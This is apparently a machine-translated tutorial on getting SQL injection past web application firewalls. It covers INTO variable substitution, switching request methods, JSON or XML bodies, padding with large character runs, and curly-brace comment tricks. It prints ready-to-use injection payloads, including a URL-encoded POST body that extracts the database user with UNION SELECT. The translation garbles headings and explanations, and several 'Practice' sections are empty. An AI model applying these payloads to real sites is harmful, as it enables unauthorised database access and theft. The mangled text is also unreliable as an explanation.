One 、order by Bypass

 When  order by  When filtered , Unable to guess the number of fields , You can use  into  Replace variable names .
select * from users where id=1 into @a,@b,@c,@d;

Two 、http The same parameter request bypasses

1、 Principle analysis

waf  When detecting dangerous characters , Respectively  post Request and  get The request sets different matching rules , The request was intercepted , Changing the request mode has a chance to bypass the detection .
 If the program can receive  get、post, If  waf  Only right  get Match interception , No, right  post To intercept .
<?php
echo $_REQUEST['id'];
?>
 There are some  waf  As long as there is a  GET perhaps  POST, Priority matching  POST, This leads to being bypassed .

2、 Practice

3、 ... and 、application/json perhaps text/xml Bypass

1、 Principle analysis

 Some programs are  json  Submit parameters , The procedure is also  json  receive , And then spliced to  SQL  perform .
json  The format is usually not intercepted . So you can bypass  waf.

text/xml  Will not be intercepted .

Four 、 Run a large number of character bypasses

1、 Principle analysis + Practice

 have access to  select 0xA  Run some characters from around to break through some  waf  Intercept .
id=1 and (select 1) and (select 0xA*1000) union select 1,user()-- &submit=1

post code ：
id%3d1+and+(select+1)+and+(select+0xA*1000)+union+select+1,user()--+%26submit%3d1

5、 ... and 、 Flower expansion bypasses

1、 Principle analysis

select 1,2 union select{
    x 1},user();
 To the left of the curly bracket is the content of the comment , This can help some  waf  Interception of .

2、 Practice

 select * from users where id=1 union select {
    xxx 1},{
    yyy 2},{
    zzz 3},user();